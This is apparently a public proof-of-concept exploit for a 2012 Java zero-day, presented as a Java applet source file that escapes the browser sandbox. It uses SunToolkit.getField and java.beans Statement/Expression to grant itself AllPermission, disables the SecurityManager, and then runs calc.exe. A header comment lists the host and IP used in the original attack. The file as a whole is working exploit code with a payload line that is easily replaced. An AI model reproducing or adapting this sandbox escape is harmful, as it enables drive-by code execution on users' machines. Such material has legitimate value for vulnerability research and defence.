1. //

  2. // CVE-2012-XXXX Java 0day

  3. //

  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html

  5. // 

  6. // secret host / ip : ok.aa24.net / 59.120.154.62

  7. //

  8. // regurgitated by jduck

  9. //

  10. // probably a metasploit module soon...

  11. //

  12. package cve2012xxxx;

  13. 

  14. import java.applet.Applet;

  15. import java.awt.Graphics;

  16. import java.beans.Expression;

  17. import java.beans.Statement;

  18. import java.lang.reflect.Field;

  19. import java.net.URL;

  20. import java.security.*;

  21. import java.security.cert.Certificate;

  22. 

  23. public class Gondvv extends Applet

  24. {

  25. 

  26.     public Gondvv()

  27.     {

  28.     }

  29. 

  30.     public void disableSecurity()

  31.         throws Throwable

  32.     {

  33.         Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);

  34.         Permissions localPermissions = new Permissions();

  35.         localPermissions.add(new AllPermission());

  36.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);

  37.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {

  38.             localProtectionDomain

  39.         });

  40.         SetField(Statement.class, "acc", localStatement, localAccessControlContext);

  41.         localStatement.execute();

  42.     }

  43. 

  44.     private Class GetClass(String paramString)

  45.         throws Throwable

  46.     {

  47.         Object arrayOfObject[] = new Object[1];

  48.         arrayOfObject[0] = paramString;

  49.         Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);

  50.         localExpression.execute();

  51.         return (Class)localExpression.getValue();

  52.     }

  53. 

  54.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)

  55.         throws Throwable

  56.     {

  57.         Object arrayOfObject[] = new Object[2];

  58.         arrayOfObject[0] = paramClass;

  59.         arrayOfObject[1] = paramString;

  60.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);

  61.         localExpression.execute();

  62.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);

  63.     }

  64. 

  65.     public void init()

  66.     {

  67.         try

  68.         {

  69.             disableSecurity();

  70.             Process localProcess = null;

  71.             localProcess = Runtime.getRuntime().exec("calc.exe");

  72.             if(localProcess != null);

  73.                localProcess.waitFor();

  74.         }

  75.         catch(Throwable localThrowable)

  76.         {

  77.             localThrowable.printStackTrace();

  78.         }

  79.     }

  80. 

  81.     public void paint(Graphics paramGraphics)

  82.     {

  83.         paramGraphics.drawString("Loading", 50, 25);

  84.     }

  85. }